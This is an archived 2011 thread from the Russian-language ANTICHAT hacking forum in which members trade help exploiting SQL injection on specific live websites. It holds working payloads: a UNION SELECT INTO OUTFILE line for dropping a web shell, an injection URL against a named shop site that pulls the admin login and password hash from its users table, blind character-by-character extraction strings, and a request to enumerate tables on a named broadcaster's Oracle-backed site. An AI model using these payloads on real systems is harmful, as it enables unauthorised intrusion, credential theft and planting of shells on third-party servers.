ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.09.2011, 16:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
657
Репутация:
0
|
|
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
|
|
|
|
02.09.2011, 16:36
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от gh0stface
gh0stface said:
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.
|
|
|
03.09.2011, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
10040
Репутация:
7
|
|
Сообщение от Qwert321
Qwert321 said:
Подскажите плз. При вставке квадратных скобок, начинает выдавать( я так понял тип запроса) Array - www.magazin.seti.ee/modules/Board/recherche.php?action=1&terme[] , а когда вписываешь %00 в скобки, то вообще запрос выдает нулевое. запрос делается по типу ...&terme="query" ...как раскрутить багу?
Логин и пасс админа.
Код:
Code:
http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8,9,10,11+from+m_seti_users+limit+0,1%23
|
|
|
|
03.09.2011, 22:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Я пожалуй процитирую первый пост:
Сообщение от None
В этой и только в этой теме вы можете задать вопрос
про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках
(для остального есть поиск по форуму)
.
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется
Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК!
Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН.
Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал.
Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже. |
|
|
|
03.09.2011, 23:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
1931
Репутация:
0
|
|
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить select перед user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring(( SELECT user()),1,1))>=100,1,0)/*
то выдает ошибку
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
Может из-за версии mysql 3.23.44 ? |
|
|
|
03.09.2011, 23:49
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от LamerHacker
LamerHacker said:
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить
select
перед
user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring((
SELECT
user()),1,1))>=100,1,0)/*
то выдает ошибку
Может из-за версии mysql 3.23.44 ?
Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.
|
|
|
|
04.09.2011, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
1931
Репутация:
0
|
|
Спасибо
Из-за версии не получается так же подставить UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
|
|
|
|
04.09.2011, 01:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от LamerHacker
LamerHacker said:
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
посимвольный брут
|
|
|
|
05.09.2011, 20:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
есть скуля
Код:
Code:
http://www.vgtrk.com/rnews.html?sid=86&id=4716
стоит oracle
подскажите как вывести таблицы и колонки? |
|
|
|
05.09.2011, 20:58
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от LamerHacker
LamerHacker said:
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
https://rdot.org/forum/showthread.php?t=503
__________________
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид